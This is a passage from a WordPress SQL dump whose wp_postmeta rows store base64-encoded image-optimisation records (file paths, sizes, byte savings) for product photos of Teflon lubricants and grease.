vd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTItODAweDUzMC5qcGciLCJyZWR1Y3Rpb24iOjI5NDQsInRpbWUiOjE0ODM1NjIyNDMsImlkIjoxODIwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMi03Njh4NTA5LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTA5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMi03Njh4NTA5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMi03Njh4NTA5LmpwZyIsInJlZHVjdGlvbiI6MjczOCwidGltZSI6MTQ4MzU2MjI0NywiaWQiOjE4MjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTE2MDB4MTA2MC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDYwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMi0xNjAweDEwNjAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTE2MDB4MTA2MC5qcGciLCJyZWR1Y3Rpb24iOjExMzk4LCJ0aW1lIjoxNDgzNTYyMjUxLCJpZCI6MTgyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjc2NywidGltZSI6MTQ4MzU2MjI1NCwiaWQiOjE4MjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo2MTAsInRpbWUiOjE0ODM1NjIyNTcsImlkIjoxODIwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjY0LCJ0aW1lIjoxNDgzNTYyMjYxLCJpZCI6MTgyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjIzMTIsInRpbWUiOjE0ODM1NjIyNjQsImlkIjoxODIwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo1MDgsInRpbWUiOjE0ODM1NjIyNjgsImlkIjoxODIwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo5MzksInRpbWUiOjE0ODM1NjIyNzEsImlkIjoxODIwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3OTUsInRpbWUiOjE0ODM1NjIyNzQsImlkIjoxODIwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTQ1MHgyOTguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTQ1MHgyOTguanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIyOTgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yLTQ1MHgyOTguanBnIiwicmVkdWN0aW9uIjoxMDk5LCJ0aW1lIjoxNDgzNTYyMjc4LCJpZCI6MTgyMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMi05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMi05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjQ0MywidGltZSI6MTQ4MzU2MjI4MSwiaWQiOjE4MjB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29134, 1818, 'wpfc_optimisation_reduction', '2676843'); 
INSERT INTO `wp_postmeta` VALUES (29135, 1818, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVIuanBnIiwicmVkdWN0aW9uIjoyNjc2NjkwLCJ0aW1lIjoxNDgzNTYyMjkzLCJpZCI6IjE4MTgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjI5NiwiaWQiOjE4MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyMjk5LCJpZCI6MTgxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjIzMDIsImlkIjoxODE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyMzA2LCJpZCI6MTgxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjIzMDksImlkIjoxODE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjMxMiwiaWQiOjE4MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyMzE1LCJpZCI6MTgxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjIzMTgsImlkIjoxODE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyMzIwLCJpZCI6MTgxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjMyNSwiaWQiOjE4MTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjIzMjksImlkIjoxODE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UU1MtSkFSLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyMzMyLCJpZCI6MTgxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRTUy1KQVItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVFNTLUpBUi05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjE0MSwidGltZSI6MTQ4MzU2MjMzNSwiaWQiOjE4MTh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29136, 1817, 'wpfc_optimisation_reduction', '2948042'); 
